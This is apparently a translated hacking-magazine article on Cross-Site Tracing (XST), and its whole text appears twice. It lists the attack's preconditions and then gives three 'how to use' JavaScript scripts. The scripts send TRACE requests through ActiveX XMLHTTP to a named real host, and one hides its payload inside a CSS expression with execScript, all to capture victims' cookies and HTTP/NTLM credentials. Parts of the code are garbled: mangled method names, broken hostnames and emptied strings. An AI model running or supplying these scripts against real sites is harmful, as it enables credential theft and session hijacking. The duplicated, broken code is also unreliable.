Note: The article has been published in the 8th issue of Hacker Defense, and the copyright belongs to it
XST attack description:
The attacker embeds malicious code into a web file on a controlled host. When the visitor browses, the malicious code is executed in the browser. Then the visitor's cookies, http basic verification and ntlm verification information will be sent to the already controlled host, and at the same time, the Trace request is sent to the target host, resulting in cookie spoofing or a man-in-the-middle attack.
XST attack conditions:
1. The target web server needs to allow Trace parameters;
2. Need a place to insert XST code;
3. There are cross-domain vulnerabilities in the target site.
Comparison between XST and XSS:
Similarities: They are both very deceptive and can cause harm to the victim host. Moreover, this kind of attack is multi-platform and multi-technology. We can also use Active controls, Flash, Java, etc. to conduct XST and XSS attacks.
Advantages: It can bypass general http verification and NTLM verification
How to use:
Method 1:
<SCRIPT type=text/java script>
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");
xmlHttp.open(\"TRACE\",\"http://wmjie.51.net/swords/\",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
Method 2:
<SCRIPT type=text/java script>
<!--
function xssTRACE() {
var openWin=open(\"blank.htm\",\"swords\",\"width=500,height=400\");
var otraceswords=openWin.external;
openWin.location.href=\"http://wmjie.51.net/swords/\";
setTimeout(
function () {
//The following must be written in one line
otraceswordsNavigateAndFind('java script:xmlHttp=new ActiveXObject(\"MicrosoftXMLHTTP\");xmlHttpopen(\"TRACE\",\"http://wmjie.51.swor ds/\",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(\"Do not use document cookies to display the header information of the site wmjie.51.net/swords/.\\n\" + xmlDoc);',\"\",\"\"\"\"\"\"\"\"\"\");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
Technique 3:
<SCRIPT type=text/java script>
function xssTRACE(){
var swords = \"var xmlHttp = new ActiveXObject(\\"\\")\;(\\"TRACE\\",\\"http:///\\",false)\;()\;xmlDoc=\;alert(xmlDoc)\;\";
var target = \"http://wmjie./swords/\";
spinach = encodeURIComponent(swords + ';()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT onclick=xssTRACE() type=button value=\"XSS TRACE\">
Postscript: During the research stage, I hope to be able to attract attention and hope to exchange your experiences with you.
XST attack description:
The attacker embeds malicious code into a web file on a controlled host. When the visitor browses, the malicious code is executed in the browser. Then the visitor's cookies, http basic verification and ntlm verification information will be sent to the already controlled host, and at the same time, the Trace request is sent to the target host, resulting in cookie spoofing or a man-in-the-middle attack.
XST attack conditions:
1. The target web server needs to allow Trace parameters;
2. Need a place to insert XST code;
3. There are cross-domain vulnerabilities in the target site.
Comparison between XST and XSS:
Similarities: They are both very deceptive and can cause harm to the victim host. Moreover, this kind of attack is multi-platform and multi-technology. We can also use Active controls, Flash, Java, etc. to conduct XST and XSS attacks.
Advantages: It can bypass general http verification and NTLM verification
How to use:
Method 1:
<SCRIPT type=text/java script>
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");
xmlHttp.open(\"TRACE\",\"http://wmjie.51.net/swords/\",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
Method 2:
<SCRIPT type=text/java script>
<!--
function xssTRACE() {
var openWin=open(\"blank.htm\",\"swords\",\"width=500,height=400\");
var otraceswords=openWin.external;
openWin.location.href=\"http://wmjie.51.net/swords/\";
setTimeout(
function () {
//The following must be written in one line
otraceswordsNavigateAndFind('java script:xmlHttp=new ActiveXObject(\"MicrosoftXMLHTTP\");xmlHttpopen(\"TRACE\",\"http://wmjie.51.swor ds/\",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(\"Do not use document cookies to display the header information of the site wmjie.51.net/swords/.\\n\" + xmlDoc);',\"\",\"\"\"\"\"\"\"\"\"\");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
Technique 3:
<SCRIPT type=text/java script>
function xssTRACE(){
var swords = \"var xmlHttp = new ActiveXObject(\\"\\")\;(\\"TRACE\\",\\"http:///\\",false)\;()\;xmlDoc=\;alert(xmlDoc)\;\";
var target = \"http://wmjie./swords/\";
spinach = encodeURIComponent(swords + ';()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT onclick=xssTRACE() type=button value=\"XSS TRACE\">
Postscript: During the research stage, I hope to be able to attract attention and hope to exchange your experiences with you.